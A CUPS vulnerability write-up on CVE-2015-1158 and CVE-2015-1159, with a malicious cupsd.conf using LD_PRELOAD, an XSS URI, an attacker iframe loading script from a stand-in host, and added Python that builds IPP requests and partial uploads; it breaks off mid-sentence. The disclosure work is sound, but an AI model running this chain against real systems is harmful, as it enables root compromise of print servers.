IPP attributes are usually freed by a purpose-built routine 'ippDeleteAttribute()', which calls 'ipp_free_values()' to free the language correctly:\n\n \n\n\ncups/ipp.c:6480:\n\n \n\n\nswitch (attr->value_tag)\n\n{\n\ncase IPP_TAG_TEXTLANG :\n\ncase IPP_TAG_NAMELANG :\n\nif (element == 0 && count == attr->num_values &&\n\nattr->values[0].string.language)\n\n{\n\n_cupsStrFree(attr->values[0].string.language); \u2190 release language only once here\n\nattr->values[0].string.language = NULL;\n\n}\n\n/* Fall through to other string values */\n\n \n\n\ncase IPP_TAG_TEXT :\n\ncase IPP_TAG_NAME :\n\ncase IPP_TAG_RESERVED_STRING :\n\ncase IPP_TAG_KEYWORD :\n\ncase IPP_TAG_URI :\n\ncase IPP_TAG_URISCHEME :\n\ncase IPP_TAG_CHARSET :\n\ncase IPP_TAG_LANGUAGE :\n\ncase IPP_TAG_MIMETYPE :\n\nfor (i = count, value = attr->values + element; \u2190 for subsequent values, don't free language again\n\ni > 0;\n\ni --, value ++)\n\n{\n\n_cupsStrFree(value->string.text);\n\nvalue->string.text = NULL;\n\n}\n\nbreak;\n\n \n\n\n## Improper Teardown - Reference Count Over-Decrement (CVE-2015-1158)\n\n \n\n\nWhen freeing localized multi-value attributes, the reference count on the language string is over-decremented when creating a print job whose 'job-originating-host-name' attribute has more than one value. 
In 'add_job()', cupsd incorrectly frees the 'language' field for all strings in a group, instead of using 'ipp_free_values()'.\n\n \n\n\nscheduler/ipp.c:1626:\n\n \n\n\n/*\n\n* Free old strings\u2026 \u2190 Even 'old' strings need to be freed.\n\n*/\n\n \n\n\nfor (i = 0; i < attr->num_values; i ++)\n\n{\n\n_cupsStrFree(attr->values[i].string.text);\n\nattr->values[i].string.text = NULL;\n\nif (attr->values[i].string.language) \u2190 for all values in an attribute\n\n{\n\n_cupsStrFree(attr->values[i].string.language); \u2190 free the 'language' string\n\nattr->values[i].string.language = NULL;\n\n}\n\n}\n\n \n\n\nIn this case, 'language' field comes from the value of the 'attributes-natural-language' attribute in the request.\n\n \n\n\nTo specifically target a string and free it, we send a 'IPP_CREATE_JOB' or 'IPP_PRINT_JOB' request with a multi-value 'job-originating-host-name' attribute. The number of 'job-originating-host-name' values controls how many times the reference count is decremented. For a 10-value attribute, the reference count for 'language' is increased once, but decremented 10 times.\n\n \n\n\nThe over-decrement prematurely frees the heap block for the target string. The actual block address will be quickly re-used by subsequent allocations.\n\n \n\n\nDangling pointers to the block remain, but the content they point to changes when blocks are freed or reused. This is the basic exploit primitive upon which we build.\n\n \n\n\n# Exploit Strategy\n\n \n\n\n## ACL Implementation\n\n \n\n\nCupsd allows the main configuration file to be remotely changed via an HTTP PUT request to '/admin/conf/cupsd.conf'. 
This is a privileged operation, protected by an ACL in the default configuration file:\n\n \n\n\ncupsd.conf:\n\n \n\n\n# Restrict access to the admin pages...\n\n<Location /admin>\n\nOrder allow,deny\n\n</Location>\n\n \n\n\n# Restrict access to configuration files...\n\n<Location /admin/conf>\n\nAuthType Default\n\nRequire user @SYSTEM\n\nOrder allow,deny\n\n</Location>\n\n \n\n\nThis 'Location' directive is stored in a global array 'Locations', which is an array of 'cupsd_location_t' structures:\n\n \n\n\nscheduler/auth.h:89:\n\n \n\n\ntypedef struct\n\n{\n\nchar *location; /* Location of resource */\n\nsize_t length; /* Length of location string */\n\nipp_op_t op; /* IPP operation */\n\nint limit, /* Limit for these types of requests */\n\norder_type, /* Allow or Deny */\n\ntype, /* Type of authentication */\n\nlevel, /* Access level required */\n\nsatisfy; /* Satisfy any or all limits? */\n\ncups_array_t *names, /* User or group names */\n\n*allow, /* Allow lines */\n\n*deny; /* Deny lines */\n\nhttp_encryption_t encryption; /* To encrypt or not to encrypt... */ \u2190 Very existential :)\n\n} cupsd_location_t;\n\n \n\n\nThe 'location' field in each structure holds the path from the 'Location' configuration directive, and fortuitously happens to be a reference counted string.\n\n \n\n\nCUPS matches requests to a 'Location' ACL via 'cupsdFindBest()', which searches for the 'Location' directive that matches the largest canonical portion of the requested path. For example, a 'PUT /admin/conf/cupsd.conf' would match the 'Location' '/admin/conf' better than '/admin', and fall under that (in this case more-restrictive) ACL. 
If the 'Location' directive for '/admin/conf' didn't exist, the request would instead match the less-specific 'Location' ACL for '/admin', or eventually simply a default ACL for '/'.\n\n \n\n\nThe fidelity of string content for 'Location' directives is important, perhaps.\n\n## Use of the Basic Exploit Primitive\n\n \n\n\nI use our basic exploit primitive to target the 'location' path strings in the two 'cupsd_location_t' structures for the above-mentioned 'Location' directives.\n\n \n\n\nI over-decrement reference counts on strings '/admin/conf' and '/admin'. The 'location' pointers in the 'cupsd_location_t' remain dangling, and point to different content when the block is re-used and overwritten.\n\n \n\n\nAs a result, the ACL's fail to match their intended requests. This allows unrestricted access to privileged operations, allowing an un-authenticated user to upload a replacement configuration file.\n\n \n\n\nHere's a gdb dump of the exploit leaking reference counts for '/admin/conf':\n\n \n\n\n(gdb) x/gx 0x7F0D577C7000+0x2639C0\n\n0x7f0d57a2a9c0 <Locations>: 0x00007f0d5980c8e0\n\n(gdb) x/64gx 0x00007f0d5980c8e0\n\n0x7f0d5980c8e0: 0x0000001000000003 0x0000000000000003\n\n0x7f0d5980c8f0: 0x0000000000000001 0x0000000000000000\n\n0x7f0d5980c900: 0x0000000000000000 0x0000000000000000\n\n<snip>\n\n0x7f0d5980d120: 0x0000000000000000 0x0000000000000051\n\n0x7f0d5980d130: 0x00007f0d5980d184 0x0000007f00000000\n\n0x7f0d5980d140: 0x0000000100000006 0x0000000000000000\n\n0x7f0d5980d150: 0x0000000000000000 0x0000000000000000\n\n0x7f0d5980d160: 0x0000000000000000 0x0000000000000000\n\n0x7f0d5980d170: 0x0000000000000000 0x0000000000000021\n\n0x7f0d5980d180: 0x6d64612f00000001 0x0000000000006e69\n\n0x7f0d5980d190: 0x0000000000000000 0x0000000000000051\n\n0x7f0d5980d1a0: 0x00007f0d5980d1f4 0x0000007f00000000 \u2190 Pointer to '/admin/conf' here.\n\n0x7f0d5980d1b0: 0x000000010000000b 0x00000001ffffffff\n\n0x7f0d5980d1c0: 0x0000000000000000 0x00007f0d5980d210\n\n0x7f0d5980d1d0: 
0x0000000000000000 0x0000000000000000\n\n0x7f0d5980d1e0: 0x0000000000000000 0x0000000000000021\n\n0x7f0d5980d1f0: 0x6d64612f00000001 0x00666e6f632f6e69\n\n0x7f0d5980d200: 0x0000000000000000 0x00000000000000e1\n\n<snip>\n\n(gdb) x/s 0x00007f0d5980d1f4\n\n0x7f0d5980d1f4: \"/admin/conf\"\n\n(gdb) x/20i 0x7F0D577C7000+0x12A10 \u2190 Reference count over-decrement code in 'add_job()'.\n\n0x7f0d577d9a10: movslq %r14d,%r12\n\n0x7f0d577d9a13: add $0x2,%r12\n\n0x7f0d577d9a17: shl $0x4,%r12\n\n0x7f0d577d9a1b: add %r15,%r12\n\n0x7f0d577d9a1e: mov 0x8(%r12),%rdi\n\n0x7f0d577d9a23: callq 0x7f0d577d3010 <_cupsStrFree@plt>\n\n0x7f0d577d9a28: mov (%r12),%rdi\n\n0x7f0d577d9a2c: movq $0x0,0x8(%r12)\n\n0x7f0d577d9a35: test %rdi,%rdi\n\n0x7f0d577d9a38: je 0x7f0d577d9a47\n\n0x7f0d577d9a3a: callq 0x7f0d577d3010 <_cupsStrFree@plt>\n\n0x7f0d577d9a3f: movq $0x0,(%r12)\n\n0x7f0d577d9a47: inc %r14d\n\n0x7f0d577d9a4a: jmp 0x7f0d577d9a4f\n\n0x7f0d577d9a4c: xor %r14d,%r14d\n\n0x7f0d577d9a4f: cmp %r14d,0x18(%r15)\n\n0x7f0d577d9a53: jg 0x7f0d577d9a10\n\n0x7f0d577d9a55: lea 0x38(%rbx),%rdi\n\n0x7f0d577d9a59: movl $0x42,0xc(%r15)\n\n0x7f0d577d9a61: movl $0x1,0x18(%r15)\n\n(gdb) b *0x7f0d577d9a10\n\nBreakpoint 1 at 0x7f0d577d9a10\n\n(gdb) c\n\nContinuing.\n\n \n\n\nBreakpoint 1, 0x00007f0d577d9a10 in ?? 
()\n\n(gdb) display/i $rip\n\n1: x/i $rip\n\n=> 0x7f0d577d9a10: movslq %r14d,%r12\n\n(gdb) x/16gx $r15\n\n0x7f0d59b422b0: 0x00007f0d59b65ec0 0x0000003600000002\n\n0x7f0d59b422c0: 0x00007f0d59805f44 0x000000000000000d\n\n0x7f0d59b422d0: 0x00007f0d5980d1f4 0x00007f0d59a5a494 \u2190 The same pointer as found in 'Locations'\n\n0x7f0d59b422e0: 0x00007f0d5980d1f4 0x00007f0d59a5a494\n\n0x7f0d59b422f0: 0x00007f0d5980d1f4 0x00007f0d59a5a494\n\n0x7f0d59b42300: 0x00007f0d5980d1f4 0x00007f0d59a5a494\n\n0x7f0d59b42310: 0x00007f0d5980d1f4 0x00007f0d59a5a494\n\n0x7f0d59b42320: 0x00007f0d5980d1f4 0x00007f0d59a5a494\n\n(gdb) x/16gx 0x00007f0d5980d1f4-4\n\n0x7f0d5980d1f0: 0x6d64612f00000007 0x00666e6f632f6e69 \u2190 The current reference count is 7.\n\n0x7f0d5980d200: 0x0000000000000000 0x00000000000000e1\n\n0x7f0d5980d210: 0x0000001000000001 0x00000000ffffffff\n\n0x7f0d5980d220: 0x0000000000000001 0x0000000000000000\n\n0x7f0d5980d230: 0x0000000000000000 0x0000000000000000\n\n0x7f0d5980d240: 0x0000000000000000 0x0000000000000000\n\n0x7f0d5980d250: 0x0000000000000000 0x0000000000000000\n\n0x7f0d5980d260: 0x0000000000000000 0x0000000000000000\n\n(gdb) b *0x7f0d577d9a55 \u2190 Break after end of loop, after reference count hits zero.\n\nBreakpoint 2 at 0x7f0d577d9a55\n\n(gdb) delete 1\n\n(gdb) c\n\nContinuing.\n\n \n\n\nBreakpoint 2, 0x00007f0d577d9a55 in ?? 
()\n\n1: x/i $rip\n\n=> 0x7f0d577d9a55: lea 0x38(%rbx),%rdi\n\n(gdb) x/16gx 0x7f0d5980d1f0\n\n0x7f0d5980d1f0: 0x00007f0d59a5a2f0 0x00666e6f632f6e69 \u2190 Now a free list pointer (was refcount + string start).\n\n0x7f0d5980d200: 0x0000000000000000 0x00000000000000e1\n\n0x7f0d5980d210: 0x0000001000000001 0x00000000ffffffff\n\n0x7f0d5980d220: 0x0000000000000001 0x0000000000000000\n\n0x7f0d5980d230: 0x0000000000000000 0x0000000000000000\n\n0x7f0d5980d240: 0x0000000000000000 0x0000000000000000\n\n0x7f0d5980d250: 0x0000000000000000 0x0000000000000000\n\n0x7f0d5980d260: 0x0000000000000000 0x0000000000000000\n\n(gdb) x/s 0x7f0d5980d1f4\n\n0x7f0d5980d1f4: \"\\r\\177\" \u2190 Actual content unpredictable, but predictably not '/admin/conf'.\n\n(gdb) x/16bx 0x7f0d5980d1f0\n\n0x7f0d5980d1f0: 0xf0 0xa2 0xa5 0x59 0x0d 0x7f 0x00 0x00\n\n0x7f0d5980d1f8: 0x69 0x6e 0x2f 0x63 0x6f 0x6e 0x66 0x00\n\n(gdb) \u2190 PC LOAD LETTER\n\n \n\n\n# Code Execution Via Changes to 'cupsd.conf'\n\n \n\n\n## SetEnv Directives\n\n \n\n\nAfter using the basic exploit primitive to strip ACLs, I can now specify an arbitrary new configuration file for cupsd. To run arbitrary code via configuration changes, I use the 'SetEnv' directive. Cupsd invokes CGI applications for certain requests, and the 'SetEnv' directive allows us to set arbitrary environment variables for these CGI processes.\n\n \n\n\nFor Mac OS X targets, we use the 'DYLD_INSERT_LIBRARIES' environment variable to load a library off disk into cups CGI requests. 
On Linux targets, I use the equivalent, 'LD_PRELOAD':\n\n \n\n\nLogLevel debug2\n\nListen *:631\n\nDefaultAuthType None\n\nWebInterface Yes\n\nMaxClients 1024\n\n<Location />\n\nAllow from *\n\nOrder deny,allow\n\n</Location>\n\n<Policy default>\n\nJobPrivateAccess default\n\nJobPrivateValues default\n\nSubscriptionPrivateAccess default\n\nSubscriptionPrivateValues default\n\n<Limit All>\n\nOrder deny,allow\n\n</Limit>\n\n</Policy>\n\n<Policy authenticated>\n\nJobPrivateAccess default\n\nJobPrivateValues default\n\nSubscriptionPrivateAccess default\n\nSubscriptionPrivateValues default\n\n<Limit All>\n\nOrder deny,allow\n\n</Limit>\n\n</Policy>\n\n<Policy kerberos>\n\nJobPrivateAccess default\n\nJobPrivateValues default\n\nSubscriptionPrivateAccess default\n\nSubscriptionPrivateValues default\n\n<Limit All>\n\nOrder deny,allow\n\n</Limit>\n\n</Policy>\n\nSetEnv LD_PRELOAD /var/spool/cups/000000ff\n\n## Seeding Library Files on Disk\n\n \n\n\nTo use 'SetEnv' to run code, I need to be able to write a shared library to disk, and do so in a predictable location. Cupsd stores POST bodies to disk in the 'RequestRoot' directory (on MacOS X '/private/var/spool/cups/', on Linux '/var/spool/cups'). The full filename is constructed as follows in 'cupsdReadClient()':\n\n \n\n\nscheduler/client.c:2116:\n\n \n\n\ncupsdSetStringf(&con->filename, \"%s/%08x\", RequestRoot,\n\nrequest_id ++);\n\ncon->file = open(con->filename, O_WRONLY | O_CREAT | O_TRUNC, 0640);\n\n \n\n\nWhere 'request_id' is a static integer, counting up from 0 for the lifetime of the process. This introduces some uncertainty into the filenames, but this can be countered by sending many POST requests.\n\n \n\n\nWhen a POST request is completely received, the request is processed and the temporary file is deleted. 
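The requests that drive all of this are RFC 2910 binary IPP bodies inside ordinary HTTP POSTs. The following Python is an added example written for this page, not code from the post, from CUPS or from the exploit: it encodes a minimal Print-Job request and the CUPS-Get-Printers request that reveals printer names, wraps them in the HTTP request cupsd expects on TCP/631, decodes the 8-byte header of a response, and computes the spool filename cupsd gives a POST body for a given value of its own request counter. Note that this counter is cupsd's static 'request_id', not the request-id field in the IPP body. The host, printer URI and document bytes are constructed sample input; the option to declare a Content-Length larger than the bytes sent describes an upload that is never completed.

```python
"""Minimal IPP-over-HTTP encoder (added example; not CUPS or Project Zero code).

Wire format per RFC 2910: 2-byte version, 2-byte operation-id, 4-byte
request-id, then attribute groups of (value-tag, name-length, name,
value-length, value) closed by a 0x03 end-of-attributes tag. For Print-Job
the document bytes follow the end tag.
"""
import struct
from typing import Optional, Tuple

IPP_VERSION = b"\x02\x00"             # IPP/2.0, as cupsd 2.x and its clients speak
OP_PRINT_JOB = 0x0002
OP_CUPS_GET_PRINTERS = 0x4002          # CUPS vendor operation that lists printers
TAG_OPERATION_ATTRS = 0x01
TAG_JOB_ATTRS = 0x02
TAG_END = 0x03
TAG_INTEGER = 0x21
TAG_NAME = 0x42                        # nameWithoutLanguage
TAG_KEYWORD = 0x44
TAG_URI = 0x45
TAG_CHARSET = 0x47
TAG_NATURAL_LANGUAGE = 0x48
TAG_MIME_TYPE = 0x49


def ipp_attr(tag: int, name: str, value) -> bytes:
    """One attribute: value-tag, name-length, name, value-length, value."""
    raw = struct.pack(">i", value) if isinstance(value, int) else value.encode("utf-8")
    name_b = name.encode("utf-8")
    return struct.pack(">BH", tag, len(name_b)) + name_b + struct.pack(">H", len(raw)) + raw


def ipp_header(op: int, request_id: int) -> bytes:
    """Version, operation-id and the client's request-id (a correlation id only)."""
    return IPP_VERSION + struct.pack(">HI", op, request_id)


def operation_group(printer_uri: str, user: str) -> bytes:
    """Operation attributes every request addressed to a printer starts with."""
    return (bytes([TAG_OPERATION_ATTRS])
            + ipp_attr(TAG_CHARSET, "attributes-charset", "utf-8")
            + ipp_attr(TAG_NATURAL_LANGUAGE, "attributes-natural-language", "en")
            + ipp_attr(TAG_URI, "printer-uri", printer_uri)
            + ipp_attr(TAG_NAME, "requesting-user-name", user))


def print_job_request(printer_uri: str, document: bytes, request_id: int,
                      user: str = "anonymous", job_name: str = "job") -> bytes:
    """Print-Job: operation attributes, job attributes, end tag, then document data."""
    return (ipp_header(OP_PRINT_JOB, request_id)
            + operation_group(printer_uri, user)
            + ipp_attr(TAG_NAME, "job-name", job_name)
            + ipp_attr(TAG_MIME_TYPE, "document-format", "application/octet-stream")
            + bytes([TAG_JOB_ATTRS])
            + ipp_attr(TAG_INTEGER, "copies", 1)
            + bytes([TAG_END])
            + document)


def cups_get_printers_request(request_id: int) -> bytes:
    """CUPS-Get-Printers: the unrestricted operation that reveals printer names."""
    return (ipp_header(OP_CUPS_GET_PRINTERS, request_id)
            + bytes([TAG_OPERATION_ATTRS])
            + ipp_attr(TAG_CHARSET, "attributes-charset", "utf-8")
            + ipp_attr(TAG_NATURAL_LANGUAGE, "attributes-natural-language", "en")
            + ipp_attr(TAG_KEYWORD, "requested-attributes", "printer-name")
            + bytes([TAG_END]))


def http_post(host: str, path: str, body: bytes, declared_length: Optional[int] = None) -> bytes:
    """Wrap an IPP body in the HTTP/1.1 POST cupsd expects on TCP/631.

    A declared_length larger than len(body) describes an upload the client
    does not finish; cupsd writes what it has received into RequestRoot."""
    length = len(body) if declared_length is None else declared_length
    head = ("POST %s HTTP/1.1\r\n" % path
            + "Host: %s\r\n" % host
            + "Content-Type: application/ipp\r\n"
            + "Content-Length: %d\r\n" % length
            + "Connection: close\r\n\r\n")
    return head.encode("ascii") + body


def parse_ipp_header(data: bytes) -> Tuple[Tuple[int, int], int, int]:
    """Decode the 8-byte header shared by requests and responses:
    ((major, minor), operation-id or status-code, request-id)."""
    major, minor, code, request_id = struct.unpack(">BBHI", data[:8])
    return (major, minor), code, request_id


def spool_path(request_root: str, server_request_id: int) -> str:
    """Filename cupsdReadClient() opens for a POST body: RequestRoot/%08x,
    numbered by cupsd's own static counter, not by the IPP request-id."""
    return "%s/%08x" % (request_root, server_request_id)


if __name__ == "__main__":
    req = print_job_request("ipp://localhost:631/printers/office", b"%!PS\n", 7)
    print(http_post("localhost:631", "/printers/office", req)[:120])
    print(parse_ipp_header(req), spool_path("/var/spool/cups", 0xff))
```

A completed request is processed and its spool file removed, as described above, so predicting the name only pays off when the body never completes; the '%08x' format also explains the '/var/spool/cups/000000ff' path in the 'SetEnv' line of the configuration.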
However, if the client closes the connection before cupsd receives the entire POST body, the files linger on disk.\n\n \n\n\nOn Mac OS X Yosemite with cups-2.0.2, this exploitation method yields root privileges. On some older versions of cups, and on Linux, this technique will yield execution as the 'lp' or '_lp' user.\n\n# Background on IPP (really just HTTP)\n\n \n\n\nFor the purposes of exploitation, IPP is really just HTTP.\n\n \n\n\nRFC 2910, \"Internet Printing Protocol/1.1: Encoding and Transport\", states the following in Section 4:\n\n \n\n\nHTTP/1.1 [RFC2616] is the transport layer for this protocol.\n\n \n\n\nand\n\n \n\n\nIt is REQUIRED that a printer implementation support HTTP over the\n\nIANA assigned Well Known Port 631 (the IPP default port), though a\n\nprinter implementation may support HTTP over some other port as well.\n\n \n\n\nCupsd listens on TCP/631, and answers HTTP requests with its own full-featured HTTP server implementation. This includes a full CGI implementation, and a basic template implementation.\n\n \n\n\n## Attack Surface Reduction in CUPS\n\n \n\n\nOn desktop machines, cupsd typically listens on a loopback interface, and is not remotely accessible, at least not directly:\n\n \n\n\n# Only listen for connections from the local machine.\n\nListen localhost:631\n\n \n\n\nThe HTTP features required for basic printing are logically separated from less essential functions, like CGI applications, by the 'WebInterface' configuration setting.\n\n \n\n\nMany Linux distributions ship with the web interface enabled, and as a result expose significantly more attack surface. Here's the setting from /etc/cups/cupsd.conf on Ubuntu 14.10:\n\n \n\n\n# Web interface setting...\n\nWebInterface Yes\n\n \n\n\nBy default on Mac OS X, the web interface is disabled:\n\n \n\n\n# Web interface setting...\n\nWebInterface No\n\n# XSS and IPP\n\n## CUPS Template Basics\n\n \n\n\nCUPS CGI applications use a simple, custom templating engine for HTML. 
It substitutes CGI arguments into templates, and supports some basic conditional statements. Here's an example of how it is used, from cgi-bin/jobs.c:93:\n\n \n\n\n/*\n\n* Bad operation code... Display an error...\n\n*/\n\n \n\n\ncgiStartHTML(cgiText(_(\"Jobs\")));\n\ncgiCopyTemplateLang(\"error-op.tmpl\");\n\ncgiEndHTML();\n\n \n\n\nThe template 'error-op.tmpl' has the following contents:\n\n \n\n\n<H2 CLASS=\"title\">{?title} {?printer_name} Error</H2>\n\n \n\n\n<P>Error:</P>\n\n \n\n\n<BLOCKQUOTE>Unknown operation \"{op}\"!</BLOCKQUOTE>\n\n \n\n\nSubstitutions are made from CGI arguments denoted in '{braces}'.\n\n## A Reflected XSS in the Web Interface (CVE-2015-1159)\n\n \n\n\nThe template engine is only vaguely context-aware, and only supports HTML. Template parsing and variable substitution and escaping are handled in 'cgi_copy()'.\n\n \n\n\nThe template engine has 2 special cases for 'href' attributes from HTML links. The first case 'cgi_puturi()' is unused in current templates, but the second case ends up being interesting.\n\n \n\n\nThe code is found in 'cgi_puts()', and escapes the following reserved HTML characters:\n\n<>\"'&\n\n \n\n\nThese are replaced with their HTML entity equivalents ('&lt;' etc...).\n\n \n\n\nThe function contains a curious special case to deal with HTML links in variable values. Here is a code snippet, from cgi-bin/template.c:650:\n\n \n\n\nif (*s == '<')\n\n{\n\n/*\n\n* Pass <A HREF=\"url\"> and </A>, otherwise quote it...\n\n*/\n\n \n\n\nif (!_cups_strncasecmp(s, \"<A HREF=\\\"\", 9))\n\n{\n\nfputs(\"<A HREF=\\\"\", out);\n\ns += 9;\n\n \n\n\nwhile (*s && *s != '\\\"')\n\n{\n\nif (*s == '&')\n\nfputs(\"&amp;\", out);\n\nelse\n\nputc(*s, out);\n\n \n\n\ns ++;\n\n}\n\n \n\n\nif (*s)\n\ns ++;\n\n \n\n\nfputs(\"\\\">\", out);\n\n}\n\n \n\n\nFor variable values containing '<a href=\"', all subsequent characters before a closing double-quote are subject to less restrictive escaping, where only the '&' character is escaped. 
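The consequence of that special case is clearest when it is run. Below is an added Python transliteration of the 'cgi_puts()' escaping logic quoted above, beside a hardened variant with no pass-through, both applied to the 'All Documents' link that the help CGI's template builds around the 'QUERY' argument. This is illustrative code written for this page, not CUPS source; the entity chosen for the single quote and the rendering of the template conditional as "include '?QUERY=value' when QUERY is set" are assumptions.

```python
"""Vulnerable vs hardened template escaping (added example; not CUPS source).

cgi_puts_vulnerable() transliterates the escaping logic of cgi_puts() quoted
above, including its '<A HREF="' and '</A>' pass-throughs; cgi_puts_hardened()
is the obvious fix: a value from a CGI argument is data, never markup.
"""

ENTITIES = {"<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;", "&": "&amp;"}


def cgi_puts_vulnerable(s: str) -> str:
    out = []
    i = 0
    while i < len(s):
        c = s[i]
        if c == "<" and s[i:i + 9].upper() == '<A HREF="':
            # Pass <A HREF="url"> through; only '&' is escaped up to the closing quote.
            out.append('<A HREF="')
            i += 9
            while i < len(s) and s[i] != '"':
                out.append("&amp;" if s[i] == "&" else s[i])
                i += 1
            if i < len(s):
                i += 1                      # skip the closing quote
            out.append('">')                # the original '>' is escaped later, if present
        elif c == "<" and s[i:i + 4].upper() == "</A>":
            out.append("</A>")
            i += 4
        else:
            out.append(ENTITIES.get(c, c))
            i += 1
    return "".join(out)


def cgi_puts_hardened(s: str) -> str:
    """Escape every reserved character, no exceptions."""
    return "".join(ENTITIES.get(c, c) for c in s)


def render_all_documents_link(query: str, puts=cgi_puts_vulnerable) -> str:
    """The help template's link, with {QUERY??QUERY={QUERY}:} modelled as
    '?QUERY=<value>' when QUERY is non-empty (assumption)."""
    suffix = "?QUERY=" + puts(query) if query else ""
    return '<P CLASS="l0"><A HREF="/help/%s">All Documents</A></P>' % suffix


def attribute_breakout(rendered: str) -> bool:
    """True when the static href attribute is closed early and a <script> tag
    follows it as markup rather than as attribute text."""
    start = rendered.index('<A HREF="') + len('<A HREF="')
    end = rendered.index('"', start)
    return "<script>" in rendered[end:]


if __name__ == "__main__":
    payload = '<a href=" ><script>alert(1)</script><!--'   # the page's payload, URL-decoded
    for name, puts in (("vulnerable", cgi_puts_vulnerable), ("hardened", cgi_puts_hardened)):
        html_out = render_all_documents_link(payload, puts)
        print(name, attribute_breakout(html_out), html_out)
```

With the vulnerable escaper the link renders as `<A HREF="/help/?QUERY=<A HREF=" ><script>alert(1)</script><!--">`: the first `"` emitted by the pass-through closes the template's own attribute, the space and `>` end the tag, and the script runs. The hardened escaper leaves every `<` and `"` as an entity and the attribute stays intact.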
The characters <>', and a closing \" would normally be escaped, but are echoed unaltered in this context.\n\n \n\n\nNote that the data being escaped here is client-supplied input, the variable value from the CGI argument. This code may have been intended to deal with links passed as CGI arguments. However, the template engine's limited context-awareness becomes an issue.\n\n \n\n\nTake this example from templates/help-header.tmpl:19:\n\n \n\n\n<P CLASS=\"l0\"><A HREF=\"/help/{QUERY??QUERY={QUERY}:}\">All Documents</A></P>\n\n \n\n\nIn this case, the CGI argument 'QUERY' is already contained inside a 'href' attribute of a link. If 'QUERY' starts with '<a href=\"', the double-quote in the '<A HREF=\"' that 'cgi_puts()' emits will close the 'href' attribute opened in the static portion of the template. The remainder of the 'QUERY' variable will be interpreted as HTML tags.\n\n \n\n\nRequesting the following URI will demonstrate this reflected XSS:\n\nhttp://localhost:631/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%3Ealert%28%27Linux%20crickets%20chirping%20for%20a%20patch%27%29%3C/script%3E%3C!--&SEARCH=Search\n\n \n\n\nThe 'QUERY' parameter is included in the page twice, leading to multiple unbalanced double-quotes. As such, the open comment string '<!--' is used to yield an HTML page that parses without errors.\n\n \n\n\n## Reaching Otherwise Unreachable Schedulers\n\n \n\n\nThis reflected XSS can be used to inject attacker-supplied JavaScript cross-origin, bootstrapping exploitation of the string reference count vulnerability for CUPS scheduler instances not directly reachable via the network. For example, CUPS instances bound only to a localhost interface can be exploited when a target user browses the web.\n\n \n\n\nFirst, I'll try to fetch a page protected by ACLs, to demonstrate the default state. I get an HTTP 403 and an authentication prompt, as expected:\n\n \n \n\n\n \n\n\nI see that my ACLs are working:\n\n \n \n\n\n \n\n\nNow, the target user browses the web to some site they're interested in. 
This site contains an attacker-supplied iframe that triggers the reflected XSS:\n\n \n\n\n<html>\n\n<head>\n\n<title>Right Ho, Jeeves</title>\n\n</head>\n\n<body>\n\n<img src=\"triturus_cristatus.jpg\" width=\"200\" height=\"200\">\n\n<iframe src=\"http://localhost:631/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%20src=%27http://test.evildomain/dronesclub.js%27%3E%3C/script%3E%3C!--&SEARCH=Search\" width=\"1024\" height=\"500\" tabindex=\"-1\" title=\"nothiddeniframe\"></iframe>\n\n</body>\n\n</html>\n\n \n\n\nTypically, this would be a hidden iframe, but in this case I visually display exploit debugging output, replacing 'document.body' (it was originally the CUPS help CGI output, which is ironically less informative in this case):\n\n \n \n\n\n \n\n\nAt this point, I have run attacker-supplied JavaScript in the 'localhost:631' origin, and issued HTTP / IPP requests to exploit the reference count over-decrement bug. To determine if CUPS is owned, I reload the config file page, from the first screen capture. As you can see, I've now successfully exploited a localhost-bound CUPS as the target browses the web. The target (me) is unlikely to have noticed:\n\n \n\n\n \n\n\n# Factors Affecting Scope and Impact\n\n \n\n\n## Vulnerability Lifetimes\n\n \n\n\nThe string reference count bug was introduced in CUPS 1.2.0, released mid-2006. All versions since are affected. Given the large number of affected versions, the vast majority of live unpatched CUPS installations contain the vulnerable code. A similar bug, a vanilla double-free, is present in the earliest available CUPS 1.0 versions.\n\n \n\n\nThe introduction of the 'WebInterface' configuration setting in CUPS 1.5.0 influences reachability on Mac OS X by default, but not on Linux.\n\n## Printer Configuration\n\n \n\n\nIn its initial install state, CUPS has no printer installed or configured, and a configured printer is a prerequisite for exploitation. Some systems are unlikely to ever have a printer configured. 
Adding a printer is a privileged operation, and cannot be accomplished without authentication.\n\n \n\n\nTo add a printer, a CUPS user must have permission to perform the 'CUPS-Add-Modify-Printer' operation. From any TCP/IP socket connection to cupsd, this requires user credentials on the target machine. CUPS also listens on a Unix domain socket, where adding a printer is implicitly authenticated by the underlying socket.\n\n \n\n\nThe following configuration directive from '/etc/cups/cupsd.conf' prevents remotely adding a new printer without authenticating:\n\n \n\n\n<Limit CUPS-Add-Modify-Printer CUPS-Delete-Printer CUPS-Add-Modify-Class CUPS-Delete-Class CUPS-Set-Default CUPS-Get-Devices>\n\nAuthType Default\n\nRequire user @SYSTEM\n\nOrder deny,allow\n\n</Limit>\n\n \n\n\nWhen a machine prints to a network printer, or shares a locally-attached printer with other computers on a network, a printer will be configured with CUPS. For example, the printer configuration setup UI in the Mac OS X settings pane adds printers to CUPS. If a user has never added a printer or printed anything, they will be unaffected.\n\n \n\n\n## Lack of Chroot, and Minimal Sandboxing\n\n \n\n\nThe string reference count vulnerability is triggered in code that runs as 'root'. CUPS launches sub-processes via 'cups-exec', which acts as an interstitial for CGI scripts, and creates a sandbox profile on Mac OS X. On Linux, no sandboxing is used.\n\n \n\n\n## Print Permissions\n\n \n\n\nIn order to exploit the vulnerability, the exploit must be delivered from a machine permitted to print. 
This is strictly defined as having permission to send POST requests to cupsd, and the permission to perform the 'Create-Job' or 'Print-Job' operation.\n\n \n\n\nThe ability to send any POST requests to cupsd may be restricted by the following configuration directive from '/etc/cups/cupsd.conf':\n\n \n\n\n# Restrict access to the server...\n\n<Location /> \u2190 ACL for path /\n\nOrder allow,deny\n\n</Location>\n\n \n\n\nPOST requests to '/printers/*' match this restriction, which defaults to 'deny'.\n\n \n\n\nRequests to print from 'localhost' are allowed irrespective of configuration. When a machine is purpose-configured as a network print server, an 'Allow' directive would have to be added to the 'Location' directive above to allow any network printing. For more information, see:\n\n[http://cups.org/documentation.php/doc-2.0/policies.html](<http://cups.org/documentation.php/doc-2.0/policies.html>)\n\n \n\n\nAs for the permission to 'Create-Job' or 'Print-Job', these operations aren't restricted in the default configuration:\n\n \n\n\n<Limit Create-Job Print-Job Print-URI Validate-Job>\n\nOrder deny,allow\n\n</Limit>\n\n \n\n\n## Printer Names\n\n \n\n\nIn order to craft input to exploit this vulnerability, the name of a configured printer must be known to an 